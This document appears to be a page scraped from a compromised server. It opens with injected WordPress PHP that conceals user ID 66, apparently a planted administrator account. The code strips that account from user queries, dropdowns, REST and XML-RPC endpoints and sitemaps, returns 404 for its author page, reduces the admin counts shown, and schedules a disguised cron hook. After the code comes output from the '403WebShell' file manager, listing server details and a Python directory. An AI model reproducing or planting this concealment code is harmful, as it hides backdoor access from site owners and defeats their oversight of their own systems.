add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 66;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 66 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 66;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 66;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 66;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 66;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
403WebShell 403Webshell
Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000 ) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : / proc /814 /task /40109 /root /lib /python3.12 /encodings / Upload File :
[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
July 08 2026 04:38:33
root / root
0755
__pycache__
--
July 08 2026 04:38:33
root / root
0755
__init__.py
5.746 KB
June 19 2026 12:46:00
root / root
0644
aliases.py
15.31 KB
June 19 2026 12:46:00
root / root
0644
ascii.py
1.219 KB
June 19 2026 12:46:00
root / root
0644
base64_codec.py
1.497 KB
June 19 2026 12:46:00
root / root
0644
big5.py
0.995 KB
June 19 2026 12:46:00
root / root
0644
big5hkscs.py
1.015 KB
June 19 2026 12:46:00
root / root
0644
bz2_codec.py
2.196 KB
June 19 2026 12:46:00
root / root
0644
charmap.py
2.035 KB
June 19 2026 12:46:00
root / root
0644
cp037.py
12.813 KB
June 19 2026 12:46:00
root / root
0644
cp1006.py
13.25 KB
June 19 2026 12:46:00
root / root
0644
cp1026.py
12.806 KB
June 19 2026 12:46:00
root / root
0644
cp1125.py
33.786 KB
June 19 2026 12:46:00
root / root
0644
cp1140.py
12.798 KB
June 19 2026 12:46:00
root / root
0644
cp1250.py
13.365 KB
June 19 2026 12:46:00
root / root
0644
cp1251.py
13.048 KB
June 19 2026 12:46:00
root / root
0644
cp1252.py
13.194 KB
June 19 2026 12:46:00
root / root
0644
cp1253.py
12.787 KB
June 19 2026 12:46:00
root / root
0644
cp1254.py
13.186 KB
June 19 2026 12:46:00
root / root
0644
cp1255.py
12.174 KB
June 19 2026 12:46:00
root / root
0644
cp1256.py
12.514 KB
June 19 2026 12:46:00
root / root
0644
cp1257.py
13.061 KB
June 19 2026 12:46:00
root / root
0644
cp1258.py
13.051 KB
June 19 2026 12:46:00
root / root
0644
cp273.py
13.801 KB
June 19 2026 12:46:00
root / root
0644
cp424.py
11.772 KB
June 19 2026 12:46:00
root / root
0644
cp437.py
33.754 KB
June 19 2026 12:46:00
root / root
0644
cp500.py
12.813 KB
June 19 2026 12:46:00
root / root
0644
cp720.py
13.365 KB
June 19 2026 12:46:00
root / root
0644
cp737.py
33.868 KB
June 19 2026 12:46:00
root / root
0644
cp775.py
33.668 KB
June 19 2026 12:46:00
root / root
0644
cp850.py
33.306 KB
June 19 2026 12:46:00
root / root
0644
cp852.py
34.182 KB
June 19 2026 12:46:00
root / root
0644
cp855.py
33.057 KB
June 19 2026 12:46:00
root / root
0644
cp856.py
12.132 KB
June 19 2026 12:46:00
root / root
0644
cp857.py
33.113 KB
June 19 2026 12:46:00
root / root
0644
cp858.py
33.218 KB
June 19 2026 12:46:00
root / root
0644
cp860.py
33.868 KB
June 19 2026 12:46:00
root / root
0644
cp861.py
33.821 KB
June 19 2026 12:46:00
root / root
0644
cp862.py
32.588 KB
June 19 2026 12:46:00
root / root
0644
cp863.py
33.449 KB
June 19 2026 12:46:00
root / root
0644
cp864.py
32.874 KB
June 19 2026 12:46:00
root / root
0644
cp865.py
33.807 KB
June 19 2026 12:46:00
root / root
0644
cp866.py
33.59 KB
June 19 2026 12:46:00
root / root
0644
cp869.py
32.192 KB
June 19 2026 12:46:00
root / root
0644
cp874.py
12.3 KB
June 19 2026 12:46:00
root / root
0644
cp875.py
12.553 KB
June 19 2026 12:46:00
root / root
0644
cp932.py
0.999 KB
June 19 2026 12:46:00
root / root
0644
cp949.py
0.999 KB
June 19 2026 12:46:00
root / root
0644
cp950.py
0.999 KB
June 19 2026 12:46:00
root / root
0644
euc_jis_2004.py
1.026 KB
June 19 2026 12:46:00
root / root
0644
euc_jisx0213.py
1.026 KB
June 19 2026 12:46:00
root / root
0644
euc_jp.py
1.003 KB
June 19 2026 12:46:00
root / root
0644
euc_kr.py
1.003 KB
June 19 2026 12:46:00
root / root
0644
gb18030.py
1.007 KB
June 19 2026 12:46:00
root / root
0644
gb2312.py
1.003 KB
June 19 2026 12:46:00
root / root
0644
gbk.py
0.991 KB
June 19 2026 12:46:00
root / root
0644
hex_codec.py
1.473 KB
June 19 2026 12:46:00
root / root
0644
hp_roman8.py
13.159 KB
June 19 2026 12:46:00
root / root
0644
hz.py
0.987 KB
June 19 2026 12:46:00
root / root
0644
idna.py
9.482 KB
June 19 2026 12:46:00
root / root
0644
iso2022_jp.py
1.028 KB
June 19 2026 12:46:00
root / root
0644
iso2022_jp_1.py
1.036 KB
June 19 2026 12:46:00
root / root
0644
iso2022_jp_2.py
1.036 KB
June 19 2026 12:46:00
root / root
0644
iso2022_jp_2004.py
1.048 KB
June 19 2026 12:46:00
root / root
0644
iso2022_jp_3.py
1.036 KB
June 19 2026 12:46:00
root / root
0644
iso2022_jp_ext.py
1.044 KB
June 19 2026 12:46:00
root / root
0644
iso2022_kr.py
1.028 KB
June 19 2026 12:46:00
root / root
0644
iso8859_1.py
12.867 KB
June 19 2026 12:46:00
root / root
0644
iso8859_10.py
13.271 KB
June 19 2026 12:46:00
root / root
0644
iso8859_11.py
12.046 KB
June 19 2026 12:46:00
root / root
0644
iso8859_13.py
12.96 KB
June 19 2026 12:46:00
root / root
0644
iso8859_14.py
13.332 KB
June 19 2026 12:46:00
root / root
0644
iso8859_15.py
12.902 KB
June 19 2026 12:46:00
root / root
0644
iso8859_16.py
13.239 KB
June 19 2026 12:46:00
root / root
0644
iso8859_2.py
13.09 KB
June 19 2026 12:46:00
root / root
0644
iso8859_3.py
12.782 KB
June 19 2026 12:46:00
root / root
0644
iso8859_4.py
13.063 KB
June 19 2026 12:46:00
root / root
0644
iso8859_5.py
12.71 KB
June 19 2026 12:46:00
root / root
0644
iso8859_6.py
10.579 KB
June 19 2026 12:46:00
root / root
0644
iso8859_7.py
12.543 KB
June 19 2026 12:46:00
root / root
0644
iso8859_8.py
10.777 KB
June 19 2026 12:46:00
root / root
0644
iso8859_9.py
12.848 KB
June 19 2026 12:46:00
root / root
0644
johab.py
0.999 KB
June 19 2026 12:46:00
root / root
0644
koi8_r.py
13.456 KB
June 19 2026 12:46:00
root / root
0644
koi8_t.py
12.884 KB
June 19 2026 12:46:00
root / root
0644
koi8_u.py
13.439 KB
June 19 2026 12:46:00
root / root
0644
kz1048.py
13.401 KB
June 19 2026 12:46:00
root / root
0644
latin_1.py
1.234 KB
June 19 2026 12:46:00
root / root
0644
mac_arabic.py
35.612 KB
June 19 2026 12:46:00
root / root
0644
mac_croatian.py
13.313 KB
June 19 2026 12:46:00
root / root
0644
mac_cyrillic.py
13.139 KB
June 19 2026 12:46:00
root / root
0644
mac_farsi.py
14.814 KB
June 19 2026 12:46:00
root / root
0644
mac_greek.py
13.399 KB
June 19 2026 12:46:00
root / root
0644
mac_iceland.py
13.182 KB
June 19 2026 12:46:00
root / root
0644
mac_latin2.py
13.787 KB
June 19 2026 12:46:00
root / root
0644
mac_roman.py
13.164 KB
June 19 2026 12:46:00
root / root
0644
mac_romanian.py
13.341 KB
June 19 2026 12:46:00
root / root
0644
mac_turkish.py
13.196 KB
June 19 2026 12:46:00
root / root
0644
mbcs.py
1.183 KB
June 19 2026 12:46:00
root / root
0644
oem.py
0.995 KB
June 19 2026 12:46:00
root / root
0644
palmos.py
13.202 KB
June 19 2026 12:46:00
root / root
0644
ptcp154.py
13.687 KB
June 19 2026 12:46:00
root / root
0644
punycode.py
6.722 KB
June 19 2026 12:46:00
root / root
0644
quopri_codec.py
1.489 KB
June 19 2026 12:46:00
root / root
0644
raw_unicode_escape.py
1.301 KB
June 19 2026 12:46:00
root / root
0644
rot_13.py
2.392 KB
June 19 2026 12:46:00
root / root
0755
shift_jis.py
1.015 KB
June 19 2026 12:46:00
root / root
0644
shift_jis_2004.py
1.034 KB
June 19 2026 12:46:00
root / root
0644
shift_jisx0213.py
1.034 KB
June 19 2026 12:46:00
root / root
0644
tis_620.py
12.012 KB
June 19 2026 12:46:00
root / root
0644
undefined.py
1.269 KB
June 19 2026 12:46:00
root / root
0644
unicode_escape.py
1.273 KB
June 19 2026 12:46:00
root / root
0644
utf_16.py
5.113 KB
June 19 2026 12:46:00
root / root
0644
utf_16_be.py
1.013 KB
June 19 2026 12:46:00
root / root
0644
utf_16_le.py
1.013 KB
June 19 2026 12:46:00
root / root
0644
utf_32.py
5.009 KB
June 19 2026 12:46:00
root / root
0644
utf_32_be.py
0.908 KB
June 19 2026 12:46:00
root / root
0644
utf_32_le.py
0.908 KB
June 19 2026 12:46:00
root / root
0644
utf_7.py
0.924 KB
June 19 2026 12:46:00
root / root
0644
utf_8.py
0.981 KB
June 19 2026 12:46:00
root / root
0644
utf_8_sig.py
4.036 KB
June 19 2026 12:46:00
root / root
0644
uu_codec.py
2.784 KB
June 19 2026 12:46:00
root / root
0644
zlib_codec.py
2.152 KB
June 19 2026 12:46:00
root / root
0644
Youez - 2016 - github.com/yon3zuLinuXploit